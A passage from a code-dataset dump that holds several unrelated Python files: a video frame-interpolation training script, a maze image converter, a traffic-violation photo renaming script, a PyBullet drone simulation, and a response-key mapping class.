\"ThemeGrid_MarginGutter\"\n ) # List of elements in page\n download_link_pdf = 
list_elements_page_download[-1].get_attribute(\n \"href\"\n ) # Extraction link file pdf\n\n data[\"link_pdf\"].append(download_link_pdf)\n\n # progress.update(total)\n\n print(f\"\\nCollected {total}.\")\n\n # Close webdriver\n browser.quit()\n\n return data\n","repo_name":"joseevilasio/cplp-data","sub_path":"app/web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31230876182","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport models\nimport datas\nimport configs\n\n# import configs.c1\nimport argparse\nimport torch\nimport torchvision\nimport torchvision.transforms as TF\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nimport time\nimport os\nfrom math import log10\nimport numpy as np\nimport datetime\nfrom config import Config\nfrom tensorboardX import SummaryWriter\nimport sys\n\nimport cv2\n# import torchvision.utils.transforms as TF\n\n# prepare perceptual loss\nvgg16 = torchvision.models.vgg16(pretrained=True)\nvgg16_conv_4_3 = nn.Sequential(*list(vgg16.children())[0][:22]).cuda()\nvgg16_conv_4_3 = nn.DataParallel(vgg16_conv_4_3.cuda())\n\ndef build_gauss_kernel(size=5, sigma=1.0, n_channels=1, cuda=False):\n if size % 2 != 1:\n raise ValueError(\"kernel size must be uneven\")\n grid = np.float32(np.mgrid[0:size, 0:size].T)\n gaussian = lambda x: np.exp((x - size // 2) ** 2 / (-2 * sigma ** 2)) ** 2\n kernel = np.sum(gaussian(grid), axis=2)\n kernel /= np.sum(kernel)\n # repeat same kernel across depth dimension\n kernel = np.tile(kernel, (n_channels, 1, 1))\n # conv weight should be (out_channels, groups/in_channels, h, w),\n # and since we have depth-separable convolution we want the groups dimension to be 1\n kernel = torch.FloatTensor(kernel[:, None, :, :])\n if cuda:\n kernel = kernel.cuda()\n return Variable(kernel, requires_grad=False)\n\n\ndef conv_gauss(img, kernel):\n \"\"\" convolve img with a gaussian kernel that has been built with build_gauss_kernel \"\"\"\n n_channels, _, kw, kh = kernel.shape\n img = F.pad(img, (kw // 2, kh // 2, kw // 2, kh // 2), mode='replicate')\n return F.conv2d(img, kernel, groups=n_channels)\n\n\ndef laplacian_pyramid(img, kernel, max_levels=5):\n current = img\n pyr = []\n\n for level in range(max_levels):\n filtered = conv_gauss(current, kernel)\n diff = current - filtered\n pyr.append(diff)\n current = F.avg_pool2d(filtered, 2)\n\n pyr.append(current)\n return pyr\n\n\nclass LapLoss(nn.Module):\n def __init__(self, max_levels=5, k_size=5, sigma=2.0):\n super(LapLoss, self).__init__()\n self.max_levels = max_levels\n self.k_size = k_size\n self.sigma = sigma\n self._gauss_kernel = None\n\n def forward(self, input, target):\n if self._gauss_kernel is None or self._gauss_kernel.shape[1] != input.shape[1]:\n self._gauss_kernel = build_gauss_kernel(\n size=self.k_size, sigma=self.sigma,\n n_channels=input.shape[1], cuda=input.is_cuda\n )\n pyr_input = laplacian_pyramid(input, self._gauss_kernel, self.max_levels)\n pyr_target = laplacian_pyramid(target, self._gauss_kernel, self.max_levels)\n return sum(F.l1_loss(a, b) for a, b in zip(pyr_input, pyr_target))\n\n# loss function\ndef lossfn(outputs, I1, I2, IT):\n It_warp, I1t, I2t, I1_warp, I2_warp, F12, F21, I1tf, I2tf, M, dFt1, dFt2, Ft1, Ft2, Ft1r, Ft2r, _, _, _, _ = outputs\n \n recnLoss = F.l1_loss(It_warp, IT)\n\n LapLoss_module = LapLoss()\n 
laplacian_loss = LapLoss_module(It_warp, IT)\n\n loss = 5 * laplacian_loss + 10 * recnLoss\n\n return loss\n\n\ndef get_lr(optimizer):\n for param_group in optimizer.param_groups:\n return param_group['lr']\n\n\n\n# load configuration\nparser = argparse.ArgumentParser()\nparser.add_argument('--config')\nargs = parser.parse_args()\n# args = parser.parse_config()\n\nconfig = Config.from_file(args.config)\n\n# preparing datasets\nnormalize1 = TF.Normalize(config.mean, [1.0, 1.0, 1.0])\nnormalize2 = TF.Normalize([0, 0, 0], config.std)\ntrans = TF.Compose([TF.ToTensor(), normalize1, normalize2, ])\n\nrevmean = [-x for x in config.mean]\nrevstd = [1.0/x for x in config.std]\nrevnormalize1 = TF.Normalize([0.0, 0.0, 0.0], revstd)\nrevnormalize2 = TF.Normalize(revmean, [1.0, 1.0, 1.0])\nrevNormalize = TF.Compose([revnormalize1, revnormalize2])\n\nrevtrans = TF.Compose([revnormalize1, revnormalize2, TF.ToPILImage()])\n\ntrainset = getattr(datas, config.trainset)(config.trainset_root, trans, config.train_size, config.train_crop_size)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=config.train_batch_size, shuffle=True, num_workers=32)\n\nvalidationset = getattr(datas, config.validationset)(config.validationset_root, trans, config.validation_size, config.validation_crop_size)\nvalidationloader = torch.utils.data.DataLoader(validationset, batch_size=1, shuffle=False, num_workers=8)\n\nprint(validationset)\n\n\n# model\nmodel = getattr(models, config.model)(config.pwc_path).cuda()\nmodel = nn.DataParallel(model)\n\n# optimizer\noptim_params = []\nfor k, v in model.module.named_parameters():\n if v.requires_grad:\n optim_params.append(v)\n else:\n print('Params [{:s}] will not optimize.'.format(k))\n\n#params = list(model.module.refinenet.parameters()) + list(model.module.masknet.parameters())\noptimizer = optim.Adam(optim_params, lr=config.init_learning_rate)\n\n# scheduler to decrease learning rate by a factor of 10 at milestones.\nscheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=config.milestones, gamma=0.1)\nrecorder = SummaryWriter(config.record_dir)\n\nprint('Everything prepared. Ready to train...')\nprint('We print training logs after each epoch, so it does take a while to show the logs.')\nprint('We use 4 GTX 2080Ti GPUs to train the model. About 3600s for one epoch. 
The training procedure lasts about 3-5 days.')\n\nto_img = TF.ToPILImage()\n\ndef validate():\n retImg = []\n # For details see training.\n # slomo = slomo.eval()\n psnr = 0\n psnrs = [0 , 0, 0]\n tloss = 0\n tlosses = [0, 0, 0]\n flag = True\n retImg = []\n\n with torch.no_grad():\n\n for validationIndex, validationData in enumerate(validationloader, 0):\n # if validationIndex > 10:\n # break\n\n # frame0, frame1, frameT, frame2, frame3 = validationData\n frame0, frame1, frameT1, frameT2, frameT3, frame2, frame3 = validationData\n\n ITs = [frameT1.cuda(), frameT2.cuda(), frameT3.cuda()]\n\n I0 = frame0.cuda()\n I1 = frame1.cuda()\n I2 = frame2.cuda()\n I3 = frame3.cuda()\n\n It_warps = []\n Ms = []\n\n for tt in range(3):\n IT = ITs[tt]\n\n outputs = model(I0, I1, I2, I3, tt/4.0 + 0.25)\n It_warp, I1t, I2t, I1_warp, I2_warp, F12, F21, I1tf, I2tf, M, dFt1, dFt2, Ft1, Ft2, Ft1r, Ft2r, _, _, _, _ = outputs\n\n\n It_warps.append(It_warp)\n Ms.append(M)\n\n\n loss = lossfn(outputs, I1, I2, IT)\n tlosses[tt] += loss.item()\n\n #psnr\n MSE_val = F.mse_loss(It_warp, IT)\n psnrs[tt] += (10 * log10(1 / MSE_val.item()))\n \n\n img_grid = []\n img_grid.append(revNormalize(frame1[0]))\n for tt in range(3):\n img_grid.append(Ms[tt].cpu()[0])\n img_grid.append(revNormalize(It_warps[tt].cpu()[0]))\n img_grid.append(revNormalize(frame2[0]))\n\n retImg.append(torchvision.utils.make_grid(img_grid, nrow=10, padding=10))\n\n for tt in range(3):\n psnrs[tt] /= len(validationloader)\n tlosses[tt] /= len(validationloader)\n\n\n # slomo = slomo.train()\n return psnrs, tlosses, retImg\n\ndef train():\n\n if config.train_continue: \n dict1 = torch.load(config.checkpoint)\n model.load_state_dict(dict1['model_state_dict'])\n print('Continue Training:', config.checkpoint)\n else:\n dict1 = {'loss': [], 'valLoss': [], 'valPSNR': [], 'epoch': -1}\n\n if not os.path.exists(config.checkpoint_dir):\n os.mkdir(config.checkpoint_dir)\n\n start = time.time()\n cLoss = dict1['loss']\n valLoss = dict1['valLoss']\n valPSNR = dict1['valPSNR']\n checkpoint_counter = 0\n\n\n for epoch in range(dict1['epoch'] + 1, config.epochs):\n\n print(\"Epoch: \", epoch)\n\n # Append and reset\n cLoss.append([])\n valLoss.append([])\n valPSNR.append([])\n iLoss = 0\n\n # Increment scheduler count\n scheduler.step()\n\n trainFrameIndex = 3\n for trainIndex, (trainData, t) in enumerate(trainloader, 0):\n # if trainIndex >= 200:\n # break\n # print(\"Training iteration [{}/{}]\".format(trainIndex, len(trainloader)))\n # sys.stdout.flush()\n ## Getting the input and the target from the training set\n frame0, frame1, frameT, frame2, frame3 = trainData\n\n\n I0 = frame0.cuda()\n I1 = frame1.cuda()\n I2 = frame2.cuda()\n I3 = frame3.cuda()\n IT = frameT.cuda()\n t = t.view(t.size(0,), 1, 1, 1).float().cuda()\n\n optimizer.zero_grad()\n outputs = model(I0, I1, I2, I3, t)\n loss = lossfn(outputs, I1, I2, IT)\n loss.backward()\n optimizer.step()\n\n iLoss += loss.item()\n\n if epoch % 2 == 0:\n end = time.time()\n\n psnrs, vLosses, valImgs = validate()\n\n psnr = np.mean(psnrs)\n vLoss = np.mean(vLosses)\n\n valPSNR[epoch].append(np.mean(psnrs))\n valLoss[epoch].append(np.mean(vLosses))\n\n # Tensorboard\n itr = trainIndex + epoch * (len(trainloader))\n\n recorder.add_scalars('Loss', {'trainLoss': iLoss / len(trainloader), 'validationLoss': vLoss}, itr)\n recorder.add_scalar('PSNR', psnr, itr)\n\n vtdict = {}\n psnrdict = {}\n for tt in range(3):\n vtdict['validationLoss' + str(tt + 1)] = vLosses[tt]\n psnrdict['PSNR' + str(tt + 1)] = psnrs[tt]\n\n 
recorder.add_scalars('Losst', vtdict, itr)\n recorder.add_scalars('PSNRt', psnrdict, itr)\n\n # for vi, valImg in enumerate(valImgs):\n # recorder.add_image('Validation' + str(vi), valImg , itr)\n\n endVal = time.time()\n\n print(\n \" Loss: %0.6f Iterations: %4d/%4d TrainExecTime: %0.1f ValLoss:%0.6f ValPSNR: %0.4f ValEvalTime: %0.2f LearningRate: %f\" % (\n iLoss / config.progress_iter, trainIndex, len(trainloader), end - start, vLoss, psnr, endVal - end,\n get_lr(optimizer)))\n sys.stdout.flush()\n\n cLoss[epoch].append(iLoss / len(trainloader))\n iLoss = 0\n start = time.time()\n\n # Create checkpoint after every `config.checkpoint_epoch` epochs\n if (epoch >config.min_save_epoch):\n dict1 = {\n 'Detail':\"Acceleration Aware Frame Interpolation.\",\n 'epoch':epoch,\n 'timestamp':datetime.datetime.now(),\n 'trainBatchSz':config.train_batch_size,\n 'validationBatchSz':1,\n 'learningRate':get_lr(optimizer),\n 'loss':cLoss,\n 'valLoss':valLoss,\n 'valPSNR':valPSNR,\n 'model_state_dict': model.state_dict(),\n }\n torch.save(dict1, config.checkpoint_dir + \"/AcSloMo\" + str(epoch) + \".ckpt\")\n checkpoint_counter += 1\n\n\ntrain()\n","repo_name":"lyh-18/EQVI","sub_path":"train_EQVI_lap_l1.py","file_name":"train_EQVI_lap_l1.py","file_ext":"py","file_size_in_byte":11340,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"21"} +{"seq_id":"35431569341","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 16 14:58:13 2019\r\n\r\n@author: Wayne Monteiro\r\n\"\"\"\r\nfrom PIL import Image\r\n\r\nWALL = 0\r\nPATH = 1\r\n\r\nCOLORS = {\r\n WALL: (0, 0, 0),\r\n PATH: (255, 255, 255),\r\n\r\n}\r\ndef set_color(img, x0, y0, dim, color):\r\n '''\r\n This function will put a colour to a block of pixels\r\n **Parameters***\r\n img:\r\n Points to the image\r\n\r\n x0 : *int*\r\n the initial x value of the block\r\n\r\n y0 : *int*\r\n the initial y value of the block\r\n\r\n dim : *int*\r\n Dimension of the block\r\n\r\n *** Returns***\r\n None\r\n\r\n '''\r\n\r\n for x in range(dim):\r\n for y in range(dim):\r\n img.putpixel(\r\n (dim * x0 + x, dim * y0 + y),\r\n color\r\n )\r\ndef save_maze(maze, basename, blockSize=20):\r\n '''\r\n This function will save the maze as an image file\r\n **Parameters***\r\n maze: *list* *int*\r\n List of lists containing the corresponding value of a path\r\n\r\n blockSize : *int*\r\n Number of pixels that fit into a block\r\n\r\n basename : *str*\r\n Name of maze\r\n\r\n *** Returns***\r\n None\r\n '''\r\n w_blocks = len(maze[0])\r\n h_blocks = len(maze)\r\n SIZE = (w_blocks * blockSize, h_blocks * blockSize)\r\n img = Image.new(\"RGB\", SIZE, color=COLORS[WALL])\r\n\r\n for y, row in enumerate(maze):\r\n for x, block_ID in enumerate(row):\r\n set_color(img, x, y, blockSize, COLORS[block_ID])\r\n\r\n img.save(\"%s_recreated_grid.png\"\r\n % (basename))\r\n\r\n\r\nbasename = \"trial_image_4.PNG\"\r\nIMG = Image.open(basename).convert(\"RGB\")\r\nimg = Image.open(basename).convert(\"RGB\")\r\nwidth, height = img.size\r\nprint(width, height)\r\nprint(width*height)\r\n\r\nfor x in range(width):\r\n for y in range(height):\r\n IMG.putpixel((x, y), (0, 0, 0))\r\nfor y in range(height):\r\n for x in range(width):\r\n pxl = img.getpixel((x, y))\r\n# print(pxl)\r\n if pxl == (255, 255, 255):\r\n IMG.putpixel((x, y), (255, 255, 255))\r\n\r\nnew_arr = [[0 for i in range(0, width, 2)] for j in range(0, height, 3)]\r\n#print(list(new_arr))\r\navg_sum_store=[]\r\nnewy = 0\r\nfor y in range(0, height, 3):\r\n# print(\"y=\",y)\r\n newx 
= 0\r\n for x in range(0, width, 2 ):\r\n# print(\"x=\",x)\r\n sum_val = 0\r\n if x != width -1 and y != height -1:\r\n for b in range (3):\r\n# print(b)\r\n for a in range(2):\r\n# print(a)\r\n val = IMG.getpixel((x + a, y + b))\r\n sum_val = sum_val + val[0] + val[1] + val[2]\r\n \r\n avg_sum = sum_val / (6 * 3)\r\n avg_sum_store.append(avg_sum)\r\n# print(avg_sum)\r\n if avg_sum < 42.5:\r\n new_arr[newy][newx] = 0\r\n else:\r\n new_arr[newy][newx] = 1 \r\n newx = newx + 1 \r\n newy = newy + 1\r\nprint(avg_sum_store)\r\nsave_maze(new_arr, basename, blockSize=3)\r\n\r\n\r\nfptr_2 = basename + \"only_white.png\"\r\nIMG.save(fptr_2)","repo_name":"waynemonteiro97/Software-Carpentry-Final-Project","sub_path":"check_white.py","file_name":"check_white.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42275163373","text":"import time\nimport os\nimport shutil\n\n# 功能:\n# 1. 将所有图片生成使用csv文件存储映射关系\n# 2. 根据文件名进行重命名\n\n#要求:\n# 严格按照脚本中目录名存放文件夹,\n# csv结果: /tmp/record-0.csv\n\n# 定义要处理文件所在目录\nroot_folder =\"/tmp/20190606\"\n\n# 处理后文件夹所在目录,\nres_folder =\"/tmp/20190606_ok/\"\n\n# # 要处理文件所在目录目录结构:\n# 20190606/\n# ├── 电警\n# │   ├── 东高新三路东往西方向2\n# │   │   ├── 1208\n# │   │   └── 1625\n# │   ├── 东中东路东往西方向1\n# │   │   ├── 1208\n# │   │   └── 1625\n# │   ├── 文兴路东往西方向1\n# │   │   ├── 1208\n# │   │   └── 1625\n# │   └── 交警支队门口南往北方向2\n# │   └── 1208\n# └── 卡口\n# ├── 公安局门前路段东往西方向3\n# │   ├── 1223\n# │   └── 1240\n# ├── 西路育才路口卡口东往西1\n# │   ├── 1223\n# │   └── 1240\n# └── 南卡口南往北内车道\n# ├── 1223\n# └── 1240\n\n\ndef checkFolder(folder):\n if not os.path.exists(folder):\n os.makedirs(folder)\n\ncheckFolder(res_folder)\n\n# 定义图片list,生成list\nfile_arr = []\ndef check_folder_files(folder, file=\"jpg\", ):\n g = os.walk(folder)\n for path, d, filelist in g:\n for filename in filelist:\n if filename.endswith('jpg'):\n file_arr.append(os.path.join(path, filename))\n return file_arr\n\n# 写csv数据\ndef write_file(data):\n with open(\"/tmp/record-0.csv\", 'a+') as f:\n writer = f.write(data+'\\n')\n #先写入columns_name\n pass\n\ndeal_files = check_folder_files(root_folder)\nprint(deal_files)\n\n# 定义一个函数,查找某个元素的下标,若是不存在则返回-1.\n# 返回地址下标\ndef find_number(str):\n i=0\n index=-1\n for item in device_address_arr:\n if str == item :\n index=i\n i=i+1\n return index\n\ndevice_address_arr = []\n\n# # 处理地址数组,传入地址,返回设备编号\n# def check_device_no(str=\"xxx\"):\n# if str in device_address_arr:\n# return find_number(str)\n# else:\n# device_address_arr.append(str)\n# return find_number(str)\n\naddress_dict = {\"东环大道高新三路东往西方向2\": '000001', \"东环大道文兴路东往西方向1\": '000006', \"东环大道潭中东路东往西方向1\": '000007', \"学院路交警支队门口南往北方向2\": '000008', \"屏山大道箭盘路口西往东方向1\": '000009', \"柳太路潭中西路东往西方向1\": '000010', \"潭中东路海关路口东往西方向\": '000011', \"潭中西路西环路口东往西方向1\": '000012', \"荣军路银桐路路口南往北方向2\": '000013', \"文惠桥南卡口南往北内车道(人脸)\": '000014', \"柳州市公安局门前路段东往西方向3\": '000015', \"潭中西路育才路口卡口东往西1\": '000016', \"弯塘路公园小学门口南往北方向\": '000017', \"柳石路第六中学门口南往北方向\": '000018', \"文惠桥南卡口南往北内车道\": '000019', \"友谊路卡口东往西方向3\": '000020' }\n\ndef check_device_no(str):\n try:\n return address_dict[str]\n except Exception as e:\n return '0000999'\n\n\n# 定义一个函数,查找某个元素的下标,若是不存在则返回-1.\n# check_device_no(\"定义\")\n# check_device_no(\"定义1\")\n# check_device_no(\"定义1\")\n# check_device_no(\"定义\")\n# check_device_no(\"定义2\")\n# check_device_no(\"定义\")\n# check_device_no(\"定义3\")\n\n# 处理违法时间\ndef check_vio_time(str=\"20190526110905\"):\n return 
str[0:4]+\"-\"+str[4:6]+\"-\"+str[6:8]+\"#\"+str[8:10]+\"#\"+str[10:12]+\"#\"+str[12:14]\n\n# s = check_vio_time()\n# print(s)\n\n# Process a single image\ndef check_file(file, uid):\n    file_arr = file.split(\"/\")\n    address = file_arr[4]\n    file_name_arr = file_arr[7].split(\".\")[0].split(\"_\")\n    print(file_arr)\n    print(file_name_arr)\n    time = file_name_arr[0]\n\n    last_num = file_name_arr[3]\n\n    # shebeibianhao (device number), e.g. 东高新三路东往西方向2\n    shebeibianhao = check_device_no(address)\n    # chepai (licence plate) ok\n    chepai = file_name_arr[1]\n    # weifadaima (violation code) 1208\n    weifadaima = file_arr[5]\n    # weifashijian (violation time)\n    weifashijian = check_vio_time(time)\n    # @x\n    last_str = \"@\"+last_num\n\n    new_file = str(shebeibianhao) + \"_\" + chepai+ \"_\" + weifadaima+ \"_\" + \"\"+ \"_\" + \"02\"+ \"_0_\" + \"@\"+str(uid)+\"@@@\" + weifashijian+ \"_@\"+ last_num + \"_0\" +\".jpg\"\n    return new_file\n\n# 000019_桂0007_1240_000019_2_0_@7758@@@_a1_0\n\n# print(files)\n\n# f = '/violation/20190606/卡口/南卡口南往北内车道/1240/不系安全带/20190526223419_桂000057_不系安全带_1.jpg'\n\n\ni = 1\nfor f in deal_files:\n    new_file_name = check_file(f, i)\n    data = str(i)+ \",\" + f + \",\" + new_file_name\n    write_file(data)\n    target_file = res_folder +\"/\" + new_file_name\n    shutil.copy(f, target_file)\n    i=i+1\n\n# write_file(device_address_arr)  #bug ~~\n","repo_name":"cheenwe/cheenwe.github.io","sub_path":"_posts/sh/python/check_and_rename.py","file_name":"check_and_rename.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"36279104952","text":"from gym_pybullet_drones.envs.single_agent_rl.DotAviary import DotAviary\nfrom gym_pybullet_drones.envs.single_agent_rl.BaseDotAviary import ActionType, ObservationType\nimport os\nimport yaml\nfrom gym_pybullet_drones.utils.enums import DroneModel, Physics\nimport numpy as np\nimport time\nimport argparse\n\nfrom gym_pybullet_drones.control.DSLPIDControl import DSLPIDControl\nfrom gym_pybullet_drones.control.SimplePIDControl import SimplePIDControl\nfrom gym_pybullet_drones.utils.Logger import Logger\nfrom gym_pybullet_drones.utils.utils import sync, str2bool\n\nDEFAULT_DRONES = DroneModel(\"cf2x\")\nDEFAULT_NUM_DRONES = 3\nDEFAULT_PHYSICS = Physics(\"pyb\")\nDEFAULT_GUI = True\nDEFAULT_RECORD_VISION = False\nDEFAULT_PLOT = True\nDEFAULT_USER_DEBUG_GUI = False\nDEFAULT_AGGREGATE = True\nDEFAULT_OBSTACLES = True\nDEFAULT_SIMULATION_FREQ_HZ = 240\nDEFAULT_CONTROL_FREQ_HZ = 48\nDEFAULT_DURATION_SEC = 12\nDEFAULT_OUTPUT_FOLDER = 'results'\nDEFAULT_COLAB = False\n\ndef run(\n        drone=DEFAULT_DRONES,\n        num_drones=DEFAULT_NUM_DRONES,\n        physics=DEFAULT_PHYSICS,\n        gui=DEFAULT_GUI,\n        record_video=DEFAULT_RECORD_VISION,\n        plot=DEFAULT_PLOT,\n        user_debug_gui=DEFAULT_USER_DEBUG_GUI,\n        aggregate=DEFAULT_AGGREGATE,\n        obstacles=DEFAULT_OBSTACLES,\n        simulation_freq_hz=DEFAULT_SIMULATION_FREQ_HZ,\n        control_freq_hz=DEFAULT_CONTROL_FREQ_HZ,\n        duration_sec=DEFAULT_DURATION_SEC,\n        output_folder=DEFAULT_OUTPUT_FOLDER,\n        colab=DEFAULT_COLAB\n        ):\n    # Load the parameters\n    yaml_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"../../ppo_wdail/config/params.yaml\")\n    with open(yaml_path, 'r') as f:\n        params = yaml.load(f, Loader=yaml.SafeLoader)\n\n    #### Initialize the simulation #############################\n    H = .5\n    H_STEP = .05\n    R = .3\n    INIT_XYZS = np.array([[R*np.cos((i/6)*2*np.pi+np.pi/2), R*np.sin((i/6)*2*np.pi+np.pi/2)-R, H+i*H_STEP] for i in range(num_drones)])\n    INIT_RPYS = np.array([[0, 0, i * (np.pi/2)/num_drones] for i in range(num_drones)])\n    
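# Physics steps aggregated per env.step() call; falls back to 1 when aggregation is disabled.\n    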
AGGR_PHY_STEPS = int(simulation_freq_hz/control_freq_hz) if aggregate else 1\n\n    #### Initialize a circular trajectory ######################\n    PERIOD = 10\n    NUM_WP = control_freq_hz*PERIOD\n    TARGET_POS = np.zeros((NUM_WP,3))\n    for i in range(NUM_WP):\n        TARGET_POS[i, :] = R*np.cos((i/NUM_WP)*(2*np.pi)+np.pi/2)+INIT_XYZS[0, 0], R*np.sin((i/NUM_WP)*(2*np.pi)+np.pi/2)-R+INIT_XYZS[0, 1], 0\n    wp_counters = np.array([int((i*NUM_WP/6)%NUM_WP) for i in range(num_drones)])\n\n    # Register the environment\n    obs_type = ObservationType.VIS\n    act_type = ActionType.VEL5D\n    env = DotAviary(params=params,\n                    # num_drones=params[\"env\"][\"num_drones\"],\n                    aggregate_phy_steps=AGGR_PHY_STEPS,\n                    obs=obs_type,\n                    act=act_type,\n                    freq=params[\"env\"][\"frequency\"],\n                    goal_position=(1, 1, 1),\n                    gui=gui,\n                    record=record_video,\n                    )\n    \n    #### Obtain the PyBullet Client ID from the environment ####\n    PYB_CLIENT = env.getPyBulletClient()\n\n    #### Initialize the logger #################################\n    logger = Logger(logging_freq_hz=int(simulation_freq_hz/AGGR_PHY_STEPS),\n                    num_drones=num_drones,\n                    output_folder=output_folder,\n                    colab=colab\n                    )\n\n    #### Initialize the controllers ############################\n    ctrl = DSLPIDControl(drone_model=drone)\n\n    #### Run the simulation ####################################\n    CTRL_EVERY_N_STEPS = int(np.floor(env.SIM_FREQ/control_freq_hz))\n    action = np.array([0,0,0,0,0])\n    START = time.time()\n    for i in range(0, int(duration_sec*env.SIM_FREQ), AGGR_PHY_STEPS):\n\n        #### Make it rain rubber ducks #############################\n        # if i/env.SIM_FREQ>5 and i%10==0 and i/env.SIM_FREQ<10: p.loadURDF(\"duck_vhacd.urdf\", [0+random.gauss(0, 0.3),-0.5+random.gauss(0, 0.3),3], p.getQuaternionFromEuler([random.randint(0,360),random.randint(0,360),random.randint(0,360)]), physicsClientId=PYB_CLIENT)\n\n        #### Step the simulation ###################################\n        obs, reward, done, info = env.step(action)\n\n        #### Compute control at the desired frequency ##############\n        if i%CTRL_EVERY_N_STEPS == 0:\n\n            #### Compute control for the current way point #############\n            action = np.array([1,0,0.05,10,1])\n\n            #### Go to the next way point and loop #####################\n            for j in range(num_drones): \n                wp_counters[j] = wp_counters[j] + 1 if wp_counters[j] < (NUM_WP-1) else 0\n\n        #### Log the simulation ####################################\n        for j in range(num_drones):\n            logger.log(drone=j,\n                       timestamp=i/env.SIM_FREQ,\n                       state=obs[\"full_state\"],\n                       control=np.hstack([TARGET_POS[wp_counters[j], 0:2], INIT_XYZS[j, 2], INIT_RPYS[j, :], np.zeros(6)])\n                       # control=np.hstack([INIT_XYZS[j, :]+TARGET_POS[wp_counters[j], :], INIT_RPYS[j, :], np.zeros(6)])\n                       )\n\n        #### Printout ##############################################\n        if i%env.SIM_FREQ == 0:\n            env.render()\n\n        #### Sync the simulation ###################################\n        if gui:\n            sync(i, START, env.TIMESTEP)\n\n    #### Close the environment #################################\n    env.close()\n\n    #### Save the simulation results ###########################\n    logger.save()\n    logger.save_as_csv(\"pid\") # Optional CSV save\n\n    #### Plot the simulation results ###########################\n    if plot:\n        logger.plot()\n\nif __name__ == \"__main__\":\n    #### Define and parse (optional) arguments for the script ##\n    parser = argparse.ArgumentParser(description='Helix flight script using CtrlAviary or VisionAviary and DSLPIDControl')\n    parser.add_argument('--drone', default=DEFAULT_DRONES, type=DroneModel, help='Drone model (default: CF2X)', metavar='', choices=DroneModel)\n    
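# The CLI flags below simply override the DEFAULT_* constants defined at the top of this script.\n    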
parser.add_argument('--num_drones', default=DEFAULT_NUM_DRONES, type=int, help='Number of drones (default: 3)', metavar='')\n    parser.add_argument('--physics', default=DEFAULT_PHYSICS, type=Physics, help='Physics updates (default: PYB)', metavar='', choices=Physics)\n    parser.add_argument('--gui', default=DEFAULT_GUI, type=str2bool, help='Whether to use PyBullet GUI (default: True)', metavar='')\n    parser.add_argument('--record_video', default=DEFAULT_RECORD_VISION, type=str2bool, help='Whether to record a video (default: False)', metavar='')\n    parser.add_argument('--plot', default=DEFAULT_PLOT, type=str2bool, help='Whether to plot the simulation results (default: True)', metavar='')\n    parser.add_argument('--user_debug_gui', default=DEFAULT_USER_DEBUG_GUI, type=str2bool, help='Whether to add debug lines and parameters to the GUI (default: False)', metavar='')\n    parser.add_argument('--aggregate', default=DEFAULT_AGGREGATE, type=str2bool, help='Whether to aggregate physics steps (default: True)', metavar='')\n    parser.add_argument('--obstacles', default=DEFAULT_OBSTACLES, type=str2bool, help='Whether to add obstacles to the environment (default: True)', metavar='')\n    parser.add_argument('--simulation_freq_hz', default=DEFAULT_SIMULATION_FREQ_HZ, type=int, help='Simulation frequency in Hz (default: 240)', metavar='')\n    parser.add_argument('--control_freq_hz', default=DEFAULT_CONTROL_FREQ_HZ, type=int, help='Control frequency in Hz (default: 48)', metavar='')\n    parser.add_argument('--duration_sec', default=DEFAULT_DURATION_SEC, type=int, help='Duration of the simulation in seconds (default: 12)', metavar='')\n    parser.add_argument('--output_folder', default=DEFAULT_OUTPUT_FOLDER, type=str, help='Folder where to save logs (default: \"results\")', metavar='')\n    parser.add_argument('--colab', default=DEFAULT_COLAB, type=bool, help='Whether example is being run by a notebook (default: \"False\")', metavar='')\n    ARGS = parser.parse_args()\n\n    run(**vars(ARGS))","repo_name":"allegorywrite/polka_dot","sub_path":"gym_pybullet_drones/examples/dot_fly.py","file_name":"dot_fly.py","file_ext":"py","file_size_in_byte":8459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17313451113","text":"from typing import ClassVar, Dict, Any\n\n\n# (ChrGil 2022-02-02) Changes the json_response keys to a more standardized set\nclass JsonResponseDetailTransactionReceived:\n    _json_response: ClassVar[Dict[str, Any]] = {\n        \"id\": \"id\",\n        \"nombre_beneficiario\": \"NombreBeneficiario\",\n        \"cta_beneficiario\": \"CuentaBeneficiario\",\n        \"receiving_bank__institucion\": 
\"BancoBeneficiario\",\n \"cuenta_emisor\": \"CuentaEmisor\",\n \"nombre_emisor\": \"NombreEmisor\",\n \"empresa\": \"NombreEmpresa\",\n \"rfc_curp_emisor\": \"RfcCurpEmisor\",\n \"monto\": \"monto\",\n \"concepto_pago\": \"ConceptoPago\",\n \"referencia_numerica\": \"ReferenciaNumerica\",\n \"fecha_creacion\": \"FechaCreacion\",\n \"tipo_pago__nombre_tipo\": \"TipoPago\",\n \"email\": \"EmailBeneficiario\",\n \"emisor_empresa__name\": \"PersonaRealizaOperacionName\",\n \"emisor_empresa__last_name\": \"PersonaRealizaOperacionLastName\",\n \"user_autorizada__name\": \"PersonaAutorizaOperacionName\",\n \"user_autorizada__last_name\": \"PersonaAutorizaOperacionLastName\",\n }\n\n def __init__(self, json_data: Dict[str, Any], **kwargs):\n self.json_data = self._change_key(json_data)\n self.json_data['FechaModify'] = kwargs.get('sheluded', None)\n\n def _change_key(self, json_data: Dict[str, Any]) -> Dict[str, Any]:\n return {value: json_data.get(key) for key, value in self._json_response.items()}\n","repo_name":"ManuelCL-jml/Polipay-Backup","sub_path":"apps/transaction/json_render.py","file_name":"json_render.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24077878352","text":"# Given an array of integers. Find a peak element in it. An array element is peak if it is NOT smaller than its neighbors. \n# For corner elements, we need to consider only one neighbor. For example, for input array {5, 10, 